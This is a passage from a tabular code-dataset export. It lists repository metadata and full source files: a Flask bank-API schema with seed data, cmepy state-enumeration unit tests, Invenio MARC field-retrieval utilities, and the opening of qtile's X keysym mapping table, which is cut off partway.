repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
gwdavis/bank-api | models.py | 1 | 6376 | #!flask/bin/python
########################################################################
# Table Definitions
########################################################################
Accounts = {
'customer_id': "INTEGER NOT NULL", # integer
# 'customer_name': "TEXT NOT NULL", # string
'account_number': "INTEGER PRIMARY KEY AUTOINCREMENT", # int
'account_type': "TEXT NOT NULL", # string
'balance': "REAL NOT NULL DEFAULT 0", # deprecated
'last_event_id': "INTEGER NOT NULL", # integer
'last_event_time': "TEXT NOT NULL", # decimal
'active': "INTEGER NOT NULL" # boolean
}
Balances = {
'event_id': "INTEGER", # integer
'account_number': "INTEGER NOT NULL", # string
'balance': "DECIMAL NOT NULL" # decimal
}
Customers = {
'customer_id': "INTEGER PRIMARY KEY AUTOINCREMENT",
'customer_name': "TEXT NOT NULL",
'mobile_number': "TEXT NOT NULL" # string reg-ex
}
Events = {
'event_id': "INTEGER PRIMARY KEY AUTOINCREMENT",
'timestamp': "REAL NOT NULL", # seconds since epoch
'event_type': "TEXT NOT NULL", # string
}
Transactions = {
'event_id': "INTEGER NOT NULL", # integer
'originator': "INTEGER NOT NULL", # string
'beneficiary': "INTEGER NOT NULL", # string
'amount': "REAL NOT NULL", # decimal
'reference': "TEXT NOT NULL" # string
}
Settings = {
'id': "INTEGER PRIMARY KEY AUTOINCREMENT",
'savings_rate': "REAL NOT NULL",
'close_of_biz': "TEXT NOT NULL",
'compound_int_type': "TEXT NOT NULL"
}
# To Do - refactor settings module
# Defaults = {
# 'id': "INTEGER PRIMARY KEY AUTOINCREMENT",
# 'savings_rate': "REAL NOT NULL",
# 'close_of_biz': "TEXT NOT NULL",
# 'compound_int_type': "TEXT NOT NULL"
# }
########################################################################
# Data
########################################################################
# To Do - refactor settings module
# defaults = {
# 'close_of_biz': '24:59:59',
# 'compound_int_type': 'continuous'
# }
# settings = {'savings_rate': 0.0125,
# 'close_of_biz': '20:00:00',
# 'compounding_int_type': 'continuous'
# }
accounts = [
{
'customer_id': 1, # integer
'customer_name': u'treasury', # string
'account_number': 12345678, # int
'account_type': u'dda', # string
'balance': 95000, # deprecated
'last_event_id': 4, # integer
'last_event_time': 1479444205.588373, # decimal
'active': True # boolean
},
{
'customer_id': 2,
'customer_name': u'Gary Davis',
'account_number': 48739278,
'account_type': u'dda',
'balance': 1000,
'last_event_id': 2,
'last_event_time': 1479444203.588373,
'active': True
},
{
'customer_id': 3,
'customer_name': u'Gordon Baird',
'account_number': 48739777,
'account_type': u'dda',
'balance': 2000,
'last_event_id': 3,
'last_event_time': 1479444204.588373,
'active': True
},
{
'customer_id': 3,
'customer_name': u'Gordon Baird',
'account_id': 4,
'account_number': 48739778,
'account_type': u'savings',
'interest': True,
'interest_rate': 'savings_rate',
'balance': 2000,
'last_event_id': 4,
'last_event_time': 1479444205.588373,
'active': True
},
]
balances = [
{
'account_number': 12345678, # string
'event_id': 1, # integer
'balance': 100000 # decimal
},
{
'account_number': 48739278,
'event_id': 2,
'balance': 1000
},
{
'account_number': 12345678,
'event_id': 2,
'balance': 99000
},
{
'account_number': 48739777,
'event_id': 3,
'balance': 2000
},
{
'account_number': 12345678,
'event_id': 3,
'balance': 97000
},
{
'account_number': 48739778,
'event_id': 4,
'balance': 2000
},
{
'account_number': 12345678,
'event_id': 4,
'balance': 95000
},
]
customers = [
{
'customer_id': 1,
'customer_name': u'treasury',
'mobile_number': u'212-111-1111'
},
{
'customer_id': 2,
'customer_name': u'Gary Davis',
'mobile_number': u'914-419-9788'
},
{
'customer_id': 3,
'customer_name': u'Gordon Baird',
'mobile_number': u'203-111-1111'
}
]
events = [
{
'event_id': 1, # integer
'timestamp': 1479444202.588373, # seconds since epoch
'event_type': 'transfer', # string
},
{
'event_id': 2, # integer
'timestamp': 1479444203.588373,
'event_type': 'transfer', # string
},
{
'event_id': 3, # integer
'timestamp': 1479444204.588373,
'event_type': 'transfer', # string
},
{
'event_id': 4, # integer
'timestamp': 1479444205.588373,
'event_type': 'transfer', # string
},
]
transactions = [
{
'event_id': 2, # integer
'originator': 12345678, # string
'beneficiary': 48739278, # string
'amount': -1000, # decimal
'reference': u'Initial Deposit' # string
},
{
'event_id': 2,
'originator': 48739278,
'beneficiary': 12345678,
'amount': 1000,
'reference': u'Initial Deposit'
},
{
'event_id': 3,
'originator': 12345678,
'beneficiary': 48739777,
'amount': -2000,
'reference': u'Initial Deposit'
},
{
'event_id': 3,
'originator': 48739777,
'beneficiary': 12345678,
'amount': 2000,
'reference': u'Initial Deposit'
},
{
'event_id': 4,
'originator': 12345678,
'beneficiary': 48739778,
'amount': -2000,
'reference': u'Initial Deposit'
},
{
'event_id': 4,
'originator': 48739778,
'beneficiary': 12345678,
'amount': 2000,
'reference': u'Initial Deposit'
}
]
| mit | -2,406,727,738,356,722,000 | 25.347107 | 72 | 0.480552 | false |
hegland/cmepy | cmepy/tests/state_enum_tests.py | 1 | 4574 | import unittest
import numpy
from numpy.testing.utils import assert_array_equal
import cmepy.state_enum as state_enum
class StateEnumTests(unittest.TestCase):
def test_simple_init(self):
states = [[0, 0, 1, 1, 2, 1, 2],
[0, 1, 0, 1, 1, 2, 2]]
enum = state_enum.create(states)
enum.indices(states)
enum.states([6, 5, 4, 3, 2, 1, 0])
# verify that ordered_states are the same as manually sorting
# with lexsort
sorted_states = numpy.array(states)
order = numpy.lexsort(sorted_states)
sorted_states = sorted_states[:, order]
assert_array_equal(enum.ordered_states,
sorted_states)
# verify that the states have been enumerated with
# respect to lexical ordering
assert_array_equal(enum.states(order), states)
assert_array_equal(enum.indices(states), order)
def test_non_unique_indices_query(self):
states = [[0, 0, 1, 1, 2, 7, 2],
[0, 1, 0, 1, 1, 0, 2]]
goal_order = [0, 2, 5, 1, 3, 4, 6]
assert_array_equal(numpy.lexsort(states),
goal_order)
enum = state_enum.create(states)
# verify that looking up the indices
# for a collection of non-unique query states
# returns a correctly sized index array with the correct
# corresponding indices
query_states = [[7, 2, 1, 2, 1, 7, 7, 2, 1],
[0, 1, 0, 2, 0, 0, 0, 2, 1]]
indices = enum.indices(query_states)
assert_array_equal(indices,
[2, 5, 1, 6, 1, 2, 2, 6, 4])
def test_non_unique_contains_query(self):
states = [[0, 0, 1, 1, 2, 7, 2],
[0, 1, 0, 1, 1, 0, 2]]
enum = state_enum.create(states)
query_states = [[-1, 7, 2, 1, 2, 9, 1, 7, 7, 2, -1, 1],
[-1, 0, 1, 0, 2, 9, 0, 0, 0, 2, -1, 1]]
member_flags = enum.contains(query_states)
goal_member_flags = [False,
True,
True,
True,
True,
False,
True,
True,
True,
True,
False,
True]
assert_array_equal(member_flags,
goal_member_flags)
def test_non_unique_indices_query_offset(self):
states = [[0, 0, 1, 1, 2, 7, 2],
[0, 1, 0, 1, 1, 0, 2]]
goal_order = [0, 2, 5, 1, 3, 4, 6]
assert_array_equal(numpy.lexsort(states),
goal_order)
enum = state_enum.create(states)
# apply offset
offset = 42
enum.offset = offset
# verify that looking up the indices
# for a collection of non-unique query states
# returns a correctly sized index array with the correct
# corresponding indices
query_states = [[7, 2, 1, 2, 1, 7, 7, 2, 1],
[0, 1, 0, 2, 0, 0, 0, 2, 1]]
indices = enum.indices(query_states)
assert_array_equal(indices - offset,
[2, 5, 1, 6, 1, 2, 2, 6, 4])
def test_pack_unpack_distributions(self):
states = [[0, 0, 1, 1, 2, 7, 2],
[0, 1, 0, 1, 1, 0, 2]]
enum = state_enum.create(states)
p_sparse = {(1, 1) : 0.3,
(7, 0) : 0.2,
(1, 0) : 0.5}
p_dense = enum.pack_distribution(p_sparse)
assert_array_equal(p_dense,
[0.0, 0.5, 0.2, 0.0, 0.3, 0.0, 0.0])
q_sparse = enum.unpack_distribution(p_dense)
for state in p_sparse:
assert state in q_sparse
assert p_sparse[state] == q_sparse[state]
for state in q_sparse:
assert state in p_sparse
assert p_sparse[state] == q_sparse[state]
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(StateEnumTests)
return suite
def main():
unittest.run(StateEnumTests)
if __name__ == '__main__':
main()
| bsd-3-clause | 8,281,783,229,310,307,000 | 30.328767 | 71 | 0.446218 | false |
nkalodimas/invenio | modules/websearch/lib/search_engine_utils.py | 1 | 7053 | # -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Invenio search engine utilities."""
import string
from invenio.config import CFG_BIBFORMAT_HIDDEN_TAGS
from invenio.dbquery import run_sql
from invenio.intbitset import intbitset
def get_fieldvalues(recIDs, tag, repetitive_values=True, sort=True, split_by=0):
"""
Return list of field values for field TAG for the given record ID
or list of record IDs. (RECIDS can be both an integer or a list
of integers.)
If REPETITIVE_VALUES is set to True, then return all values even
if they are doubled. If set to False, then return unique values
only.
"""
out = []
try:
recIDs = int(recIDs)
except:
pass
if isinstance(recIDs, (int, long)):
recIDs = [recIDs,]
if not isinstance(recIDs, (list, tuple, intbitset)):
return []
if len(recIDs) == 0:
return []
if tag == "001___":
# We have asked for tag 001 (=recID) that is not stored in bibXXx
# tables.
out = [str(recID) for recID in recIDs]
else:
# we are going to look inside bibXXx tables
digits = tag[0:2]
try:
intdigits = int(digits)
if intdigits < 0 or intdigits > 99:
raise ValueError
except ValueError:
# invalid tag value asked for
return []
bx = "bib%sx" % digits
bibx = "bibrec_bib%sx" % digits
if not repetitive_values:
queryselect = "DISTINCT(bx.value)"
else:
queryselect = "bx.value"
if sort:
sort_sql = "ORDER BY bibx.field_number, bx.tag ASC"
else:
sort_sql = ""
def get_res(recIDs):
query = "SELECT %s FROM %s AS bx, %s AS bibx " \
"WHERE bibx.id_bibrec IN (%s) AND bx.id=bibx.id_bibxxx AND " \
"bx.tag LIKE %%s %s" % \
(queryselect, bx, bibx, ("%s,"*len(recIDs))[:-1], sort_sql)
return [i[0] for i in run_sql(query, tuple(recIDs) + (tag,))]
#print not sort and split_by>0 and len(recIDs)>split_by
if sort or split_by<=0 or len(recIDs)<=split_by:
return get_res(recIDs)
else:
return [i for res in map(get_res, zip(*[iter(recIDs)]*split_by)) for i in res]
return out
def get_fieldvalues_alephseq_like(recID, tags_in, can_see_hidden=False):
"""Return buffer of ALEPH sequential-like textual format with fields found
in the list TAGS_IN for record RECID.
If can_see_hidden is True, just print everything. Otherwise hide fields
from CFG_BIBFORMAT_HIDDEN_TAGS.
"""
out = ""
if type(tags_in) is not list:
tags_in = [tags_in,]
if len(tags_in) == 1 and len(tags_in[0]) == 6:
## case A: one concrete subfield asked, so print its value if found
## (use with care: can mislead if field has multiple occurrences)
out += string.join(get_fieldvalues(recID, tags_in[0]),"\n")
else:
## case B: print our "text MARC" format; works safely all the time
# find out which tags to output:
dict_of_tags_out = {}
if not tags_in:
for i in range(0, 10):
for j in range(0, 10):
dict_of_tags_out["%d%d%%" % (i, j)] = 1
else:
for tag in tags_in:
if len(tag) == 0:
for i in range(0, 10):
for j in range(0, 10):
dict_of_tags_out["%d%d%%" % (i, j)] = 1
elif len(tag) == 1:
for j in range(0, 10):
dict_of_tags_out["%s%d%%" % (tag, j)] = 1
elif len(tag) < 5:
dict_of_tags_out["%s%%" % tag] = 1
elif tag >= 6:
dict_of_tags_out[tag[0:5]] = 1
tags_out = dict_of_tags_out.keys()
tags_out.sort()
# search all bibXXx tables as needed:
for tag in tags_out:
digits = tag[0:2]
try:
intdigits = int(digits)
if intdigits < 0 or intdigits > 99:
raise ValueError
except ValueError:
# invalid tag value asked for
continue
if tag.startswith("001") or tag.startswith("00%"):
if out:
out += "\n"
out += "%09d %s %d" % (recID, "001__", recID)
bx = "bib%sx" % digits
bibx = "bibrec_bib%sx" % digits
query = "SELECT b.tag,b.value,bb.field_number FROM %s AS b, %s AS bb "\
"WHERE bb.id_bibrec=%%s AND b.id=bb.id_bibxxx AND b.tag LIKE %%s"\
"ORDER BY bb.field_number, b.tag ASC" % (bx, bibx)
res = run_sql(query, (recID, str(tag)+'%'))
# go through fields:
field_number_old = -999
field_old = ""
for row in res:
field, value, field_number = row[0], row[1], row[2]
ind1, ind2 = field[3], field[4]
printme = True
#check the stuff in hiddenfields
if not can_see_hidden:
for htag in CFG_BIBFORMAT_HIDDEN_TAGS:
ltag = len(htag)
samelenfield = field[0:ltag]
if samelenfield == htag:
printme = False
if ind1 == "_":
ind1 = ""
if ind2 == "_":
ind2 = ""
# print field tag
if printme:
if field_number != field_number_old or field[:-1] != field_old[:-1]:
if out:
out += "\n"
out += "%09d %s " % (recID, field[:5])
field_number_old = field_number
field_old = field
# print subfield value
if field[0:2] == "00" and field[-1:] == "_":
out += value
else:
out += "$$%s%s" % (field[-1:], value)
return out
| gpl-2.0 | 3,573,369,764,786,767,400 | 37.752747 | 90 | 0.510563 | false |
andrelaszlo/qtile | libqtile/xkeysyms.py | 1 | 56893 | keysyms = {
'XF86AudioLowerVolume': 0x1008ff11,
'XF86AudioMute': 0x1008ff12,
'XF86AudioRaiseVolume': 0x1008ff13,
'XF86AudioPlay': 0x1008ff14,
'XF86AudioStop': 0x1008ff15,
'XF86AudioPrev': 0x1008ff16,
'XF86AudioNext': 0x1008ff17,
'VoidSymbol': 0xffffff,
'BackSpace': 0xff08,
'Tab': 0xff09,
'Linefeed': 0xff0a,
'Clear': 0xff0b,
'Return': 0xff0d,
'Pause': 0xff13,
'Scroll_Lock': 0xff14,
'Sys_Req': 0xff15,
'Escape': 0xff1b,
'Delete': 0xffff,
'Multi_key': 0xff20,
'Codeinput': 0xff37,
'SingleCandidate': 0xff3c,
'MultipleCandidate': 0xff3d,
'PreviousCandidate': 0xff3e,
'Kanji': 0xff21,
'Muhenkan': 0xff22,
'Henkan_Mode': 0xff23,
'Henkan': 0xff23,
'Romaji': 0xff24,
'Hiragana': 0xff25,
'Katakana': 0xff26,
'Hiragana_Katakana': 0xff27,
'Zenkaku': 0xff28,
'Hankaku': 0xff29,
'Zenkaku_Hankaku': 0xff2a,
'Touroku': 0xff2b,
'Massyo': 0xff2c,
'Kana_Lock': 0xff2d,
'Kana_Shift': 0xff2e,
'Eisu_Shift': 0xff2f,
'Eisu_toggle': 0xff30,
'Kanji_Bangou': 0xff37,
'Zen_Koho': 0xff3d,
'Mae_Koho': 0xff3e,
'Home': 0xff50,
'Left': 0xff51,
'Up': 0xff52,
'Right': 0xff53,
'Down': 0xff54,
'Prior': 0xff55,
'Page_Up': 0xff55,
'Next': 0xff56,
'Page_Down': 0xff56,
'End': 0xff57,
'Begin': 0xff58,
'Select': 0xff60,
'Print': 0xff61,
'Execute': 0xff62,
'Insert': 0xff63,
'Undo': 0xff65,
'Redo': 0xff66,
'Menu': 0xff67,
'Find': 0xff68,
'Cancel': 0xff69,
'Help': 0xff6a,
'Break': 0xff6b,
'Mode_switch': 0xff7e,
'script_switch': 0xff7e,
'Num_Lock': 0xff7f,
'KP_Space': 0xff80,
'KP_Tab': 0xff89,
'KP_Enter': 0xff8d,
'KP_F1': 0xff91,
'KP_F2': 0xff92,
'KP_F3': 0xff93,
'KP_F4': 0xff94,
'KP_Home': 0xff95,
'KP_Left': 0xff96,
'KP_Up': 0xff97,
'KP_Right': 0xff98,
'KP_Down': 0xff99,
'KP_Prior': 0xff9a,
'KP_Page_Up': 0xff9a,
'KP_Next': 0xff9b,
'KP_Page_Down': 0xff9b,
'KP_End': 0xff9c,
'KP_Begin': 0xff9d,
'KP_Insert': 0xff9e,
'KP_Delete': 0xff9f,
'KP_Equal': 0xffbd,
'KP_Multiply': 0xffaa,
'KP_Add': 0xffab,
'KP_Separator': 0xffac,
'KP_Subtract': 0xffad,
'KP_Decimal': 0xffae,
'KP_Divide': 0xffaf,
'KP_0': 0xffb0,
'KP_1': 0xffb1,
'KP_2': 0xffb2,
'KP_3': 0xffb3,
'KP_4': 0xffb4,
'KP_5': 0xffb5,
'KP_6': 0xffb6,
'KP_7': 0xffb7,
'KP_8': 0xffb8,
'KP_9': 0xffb9,
'F1': 0xffbe,
'F2': 0xffbf,
'F3': 0xffc0,
'F4': 0xffc1,
'F5': 0xffc2,
'F6': 0xffc3,
'F7': 0xffc4,
'F8': 0xffc5,
'F9': 0xffc6,
'F10': 0xffc7,
'F11': 0xffc8,
'L1': 0xffc8,
'F12': 0xffc9,
'L2': 0xffc9,
'F13': 0xffca,
'L3': 0xffca,
'F14': 0xffcb,
'L4': 0xffcb,
'F15': 0xffcc,
'L5': 0xffcc,
'F16': 0xffcd,
'L6': 0xffcd,
'F17': 0xffce,
'L7': 0xffce,
'F18': 0xffcf,
'L8': 0xffcf,
'F19': 0xffd0,
'L9': 0xffd0,
'F20': 0xffd1,
'L10': 0xffd1,
'F21': 0xffd2,
'R1': 0xffd2,
'F22': 0xffd3,
'R2': 0xffd3,
'F23': 0xffd4,
'R3': 0xffd4,
'F24': 0xffd5,
'R4': 0xffd5,
'F25': 0xffd6,
'R5': 0xffd6,
'F26': 0xffd7,
'R6': 0xffd7,
'F27': 0xffd8,
'R7': 0xffd8,
'F28': 0xffd9,
'R8': 0xffd9,
'F29': 0xffda,
'R9': 0xffda,
'F30': 0xffdb,
'R10': 0xffdb,
'F31': 0xffdc,
'R11': 0xffdc,
'F32': 0xffdd,
'R12': 0xffdd,
'F33': 0xffde,
'R13': 0xffde,
'F34': 0xffdf,
'R14': 0xffdf,
'F35': 0xffe0,
'R15': 0xffe0,
'Shift_L': 0xffe1,
'Shift_R': 0xffe2,
'Control_L': 0xffe3,
'Control_R': 0xffe4,
'Caps_Lock': 0xffe5,
'Shift_Lock': 0xffe6,
'Meta_L': 0xffe7,
'Meta_R': 0xffe8,
'Alt_L': 0xffe9,
'Alt_R': 0xffea,
'Super_L': 0xffeb,
'Super_R': 0xffec,
'Hyper_L': 0xffed,
'Hyper_R': 0xffee,
'ISO_Lock': 0xfe01,
'ISO_Level2_Latch': 0xfe02,
'ISO_Level3_Shift': 0xfe03,
'ISO_Level3_Latch': 0xfe04,
'ISO_Level3_Lock': 0xfe05,
'ISO_Level5_Shift': 0xfe11,
'ISO_Level5_Latch': 0xfe12,
'ISO_Level5_Lock': 0xfe13,
'ISO_Group_Shift': 0xff7e,
'ISO_Group_Latch': 0xfe06,
'ISO_Group_Lock': 0xfe07,
'ISO_Next_Group': 0xfe08,
'ISO_Next_Group_Lock': 0xfe09,
'ISO_Prev_Group': 0xfe0a,
'ISO_Prev_Group_Lock': 0xfe0b,
'ISO_First_Group': 0xfe0c,
'ISO_First_Group_Lock': 0xfe0d,
'ISO_Last_Group': 0xfe0e,
'ISO_Last_Group_Lock': 0xfe0f,
'ISO_Left_Tab': 0xfe20,
'ISO_Move_Line_Up': 0xfe21,
'ISO_Move_Line_Down': 0xfe22,
'ISO_Partial_Line_Up': 0xfe23,
'ISO_Partial_Line_Down': 0xfe24,
'ISO_Partial_Space_Left': 0xfe25,
'ISO_Partial_Space_Right': 0xfe26,
'ISO_Set_Margin_Left': 0xfe27,
'ISO_Set_Margin_Right': 0xfe28,
'ISO_Release_Margin_Left': 0xfe29,
'ISO_Release_Margin_Right': 0xfe2a,
'ISO_Release_Both_Margins': 0xfe2b,
'ISO_Fast_Cursor_Left': 0xfe2c,
'ISO_Fast_Cursor_Right': 0xfe2d,
'ISO_Fast_Cursor_Up': 0xfe2e,
'ISO_Fast_Cursor_Down': 0xfe2f,
'ISO_Continuous_Underline': 0xfe30,
'ISO_Discontinuous_Underline': 0xfe31,
'ISO_Emphasize': 0xfe32,
'ISO_Center_Object': 0xfe33,
'ISO_Enter': 0xfe34,
'dead_grave': 0xfe50,
'dead_acute': 0xfe51,
'dead_circumflex': 0xfe52,
'dead_tilde': 0xfe53,
'dead_perispomeni': 0xfe53,
'dead_macron': 0xfe54,
'dead_breve': 0xfe55,
'dead_abovedot': 0xfe56,
'dead_diaeresis': 0xfe57,
'dead_abovering': 0xfe58,
'dead_doubleacute': 0xfe59,
'dead_caron': 0xfe5a,
'dead_cedilla': 0xfe5b,
'dead_ogonek': 0xfe5c,
'dead_iota': 0xfe5d,
'dead_voiced_sound': 0xfe5e,
'dead_semivoiced_sound': 0xfe5f,
'dead_belowdot': 0xfe60,
'dead_hook': 0xfe61,
'dead_horn': 0xfe62,
'dead_stroke': 0xfe63,
'dead_abovecomma': 0xfe64,
'dead_psili': 0xfe64,
'dead_abovereversedcomma': 0xfe65,
'dead_dasia': 0xfe65,
'dead_doublegrave': 0xfe66,
'dead_belowring': 0xfe67,
'dead_belowmacron': 0xfe68,
'dead_belowcircumflex': 0xfe69,
'dead_belowtilde': 0xfe6a,
'dead_belowbreve': 0xfe6b,
'dead_belowdiaeresis': 0xfe6c,
'dead_invertedbreve': 0xfe6d,
'dead_belowcomma': 0xfe6e,
'dead_currency': 0xfe6f,
'dead_a': 0xfe80,
'dead_A': 0xfe81,
'dead_e': 0xfe82,
'dead_E': 0xfe83,
'dead_i': 0xfe84,
'dead_I': 0xfe85,
'dead_o': 0xfe86,
'dead_O': 0xfe87,
'dead_u': 0xfe88,
'dead_U': 0xfe89,
'dead_small_schwa': 0xfe8a,
'dead_capital_schwa': 0xfe8b,
'First_Virtual_Screen': 0xfed0,
'Prev_Virtual_Screen': 0xfed1,
'Next_Virtual_Screen': 0xfed2,
'Last_Virtual_Screen': 0xfed4,
'Terminate_Server': 0xfed5,
'AccessX_Enable': 0xfe70,
'AccessX_Feedback_Enable': 0xfe71,
'RepeatKeys_Enable': 0xfe72,
'SlowKeys_Enable': 0xfe73,
'BounceKeys_Enable': 0xfe74,
'StickyKeys_Enable': 0xfe75,
'MouseKeys_Enable': 0xfe76,
'MouseKeys_Accel_Enable': 0xfe77,
'Overlay1_Enable': 0xfe78,
'Overlay2_Enable': 0xfe79,
'AudibleBell_Enable': 0xfe7a,
'Pointer_Left': 0xfee0,
'Pointer_Right': 0xfee1,
'Pointer_Up': 0xfee2,
'Pointer_Down': 0xfee3,
'Pointer_UpLeft': 0xfee4,
'Pointer_UpRight': 0xfee5,
'Pointer_DownLeft': 0xfee6,
'Pointer_DownRight': 0xfee7,
'Pointer_Button_Dflt': 0xfee8,
'Pointer_Button1': 0xfee9,
'Pointer_Button2': 0xfeea,
'Pointer_Button3': 0xfeeb,
'Pointer_Button4': 0xfeec,
'Pointer_Button5': 0xfeed,
'Pointer_DblClick_Dflt': 0xfeee,
'Pointer_DblClick1': 0xfeef,
'Pointer_DblClick2': 0xfef0,
'Pointer_DblClick3': 0xfef1,
'Pointer_DblClick4': 0xfef2,
'Pointer_DblClick5': 0xfef3,
'Pointer_Drag_Dflt': 0xfef4,
'Pointer_Drag1': 0xfef5,
'Pointer_Drag2': 0xfef6,
'Pointer_Drag3': 0xfef7,
'Pointer_Drag4': 0xfef8,
'Pointer_Drag5': 0xfefd,
'Pointer_EnableKeys': 0xfef9,
'Pointer_Accelerate': 0xfefa,
'Pointer_DfltBtnNext': 0xfefb,
'Pointer_DfltBtnPrev': 0xfefc,
'3270_Duplicate': 0xfd01,
'3270_FieldMark': 0xfd02,
'3270_Right2': 0xfd03,
'3270_Left2': 0xfd04,
'3270_BackTab': 0xfd05,
'3270_EraseEOF': 0xfd06,
'3270_EraseInput': 0xfd07,
'3270_Reset': 0xfd08,
'3270_Quit': 0xfd09,
'3270_PA1': 0xfd0a,
'3270_PA2': 0xfd0b,
'3270_PA3': 0xfd0c,
'3270_Test': 0xfd0d,
'3270_Attn': 0xfd0e,
'3270_CursorBlink': 0xfd0f,
'3270_AltCursor': 0xfd10,
'3270_KeyClick': 0xfd11,
'3270_Jump': 0xfd12,
'3270_Ident': 0xfd13,
'3270_Rule': 0xfd14,
'3270_Copy': 0xfd15,
'3270_Play': 0xfd16,
'3270_Setup': 0xfd17,
'3270_Record': 0xfd18,
'3270_ChangeScreen': 0xfd19,
'3270_DeleteWord': 0xfd1a,
'3270_ExSelect': 0xfd1b,
'3270_CursorSelect': 0xfd1c,
'3270_PrintScreen': 0xfd1d,
'3270_Enter': 0xfd1e,
'space': 0x0020,
'exclam': 0x0021,
'quotedbl': 0x0022,
'numbersign': 0x0023,
'dollar': 0x0024,
'percent': 0x0025,
'ampersand': 0x0026,
'apostrophe': 0x0027,
'quoteright': 0x0027,
'parenleft': 0x0028,
'parenright': 0x0029,
'asterisk': 0x002a,
'plus': 0x002b,
'comma': 0x002c,
'minus': 0x002d,
'period': 0x002e,
'slash': 0x002f,
'0': 0x0030,
'1': 0x0031,
'2': 0x0032,
'3': 0x0033,
'4': 0x0034,
'5': 0x0035,
'6': 0x0036,
'7': 0x0037,
'8': 0x0038,
'9': 0x0039,
'colon': 0x003a,
'semicolon': 0x003b,
'less': 0x003c,
'equal': 0x003d,
'greater': 0x003e,
'question': 0x003f,
'at': 0x0040,
'A': 0x0041,
'B': 0x0042,
'C': 0x0043,
'D': 0x0044,
'E': 0x0045,
'F': 0x0046,
'G': 0x0047,
'H': 0x0048,
'I': 0x0049,
'J': 0x004a,
'K': 0x004b,
'L': 0x004c,
'M': 0x004d,
'N': 0x004e,
'O': 0x004f,
'P': 0x0050,
'Q': 0x0051,
'R': 0x0052,
'S': 0x0053,
'T': 0x0054,
'U': 0x0055,
'V': 0x0056,
'W': 0x0057,
'X': 0x0058,
'Y': 0x0059,
'Z': 0x005a,
'bracketleft': 0x005b,
'backslash': 0x005c,
'bracketright': 0x005d,
'asciicircum': 0x005e,
'underscore': 0x005f,
'grave': 0x0060,
'quoteleft': 0x0060,
'a': 0x0061,
'b': 0x0062,
'c': 0x0063,
'd': 0x0064,
'e': 0x0065,
'f': 0x0066,
'g': 0x0067,
'h': 0x0068,
'i': 0x0069,
'j': 0x006a,
'k': 0x006b,
'l': 0x006c,
'm': 0x006d,
'n': 0x006e,
'o': 0x006f,
'p': 0x0070,
'q': 0x0071,
'r': 0x0072,
's': 0x0073,
't': 0x0074,
'u': 0x0075,
'v': 0x0076,
'w': 0x0077,
'x': 0x0078,
'y': 0x0079,
'z': 0x007a,
'braceleft': 0x007b,
'bar': 0x007c,
'braceright': 0x007d,
'asciitilde': 0x007e,
'nobreakspace': 0x00a0,
'exclamdown': 0x00a1,
'cent': 0x00a2,
'sterling': 0x00a3,
'currency': 0x00a4,
'yen': 0x00a5,
'brokenbar': 0x00a6,
'section': 0x00a7,
'diaeresis': 0x00a8,
'copyright': 0x00a9,
'ordfeminine': 0x00aa,
'guillemotleft': 0x00ab,
'notsign': 0x00ac,
'hyphen': 0x00ad,
'registered': 0x00ae,
'macron': 0x00af,
'degree': 0x00b0,
'plusminus': 0x00b1,
'twosuperior': 0x00b2,
'threesuperior': 0x00b3,
'acute': 0x00b4,
'mu': 0x00b5,
'paragraph': 0x00b6,
'periodcentered': 0x00b7,
'cedilla': 0x00b8,
'onesuperior': 0x00b9,
'masculine': 0x00ba,
'guillemotright': 0x00bb,
'onequarter': 0x00bc,
'onehalf': 0x00bd,
'threequarters': 0x00be,
'questiondown': 0x00bf,
'Agrave': 0x00c0,
'Aacute': 0x00c1,
'Acircumflex': 0x00c2,
'Atilde': 0x00c3,
'Adiaeresis': 0x00c4,
'Aring': 0x00c5,
'AE': 0x00c6,
'Ccedilla': 0x00c7,
'Egrave': 0x00c8,
'Eacute': 0x00c9,
'Ecircumflex': 0x00ca,
'Ediaeresis': 0x00cb,
'Igrave': 0x00cc,
'Iacute': 0x00cd,
'Icircumflex': 0x00ce,
'Idiaeresis': 0x00cf,
'ETH': 0x00d0,
'Eth': 0x00d0,
'Ntilde': 0x00d1,
'Ograve': 0x00d2,
'Oacute': 0x00d3,
'Ocircumflex': 0x00d4,
'Otilde': 0x00d5,
'Odiaeresis': 0x00d6,
'multiply': 0x00d7,
'Oslash': 0x00d8,
'Ooblique': 0x00d8,
'Ugrave': 0x00d9,
'Uacute': 0x00da,
'Ucircumflex': 0x00db,
'Udiaeresis': 0x00dc,
'Yacute': 0x00dd,
'THORN': 0x00de,
'Thorn': 0x00de,
'ssharp': 0x00df,
'agrave': 0x00e0,
'aacute': 0x00e1,
'acircumflex': 0x00e2,
'atilde': 0x00e3,
'adiaeresis': 0x00e4,
'aring': 0x00e5,
'ae': 0x00e6,
'ccedilla': 0x00e7,
'egrave': 0x00e8,
'eacute': 0x00e9,
'ecircumflex': 0x00ea,
'ediaeresis': 0x00eb,
'igrave': 0x00ec,
'iacute': 0x00ed,
'icircumflex': 0x00ee,
'idiaeresis': 0x00ef,
'eth': 0x00f0,
'ntilde': 0x00f1,
'ograve': 0x00f2,
'oacute': 0x00f3,
'ocircumflex': 0x00f4,
'otilde': 0x00f5,
'odiaeresis': 0x00f6,
'division': 0x00f7,
'oslash': 0x00f8,
'ooblique': 0x00f8,
'ugrave': 0x00f9,
'uacute': 0x00fa,
'ucircumflex': 0x00fb,
'udiaeresis': 0x00fc,
'yacute': 0x00fd,
'thorn': 0x00fe,
'ydiaeresis': 0x00ff,
'Aogonek': 0x01a1,
'breve': 0x01a2,
'Lstroke': 0x01a3,
'Lcaron': 0x01a5,
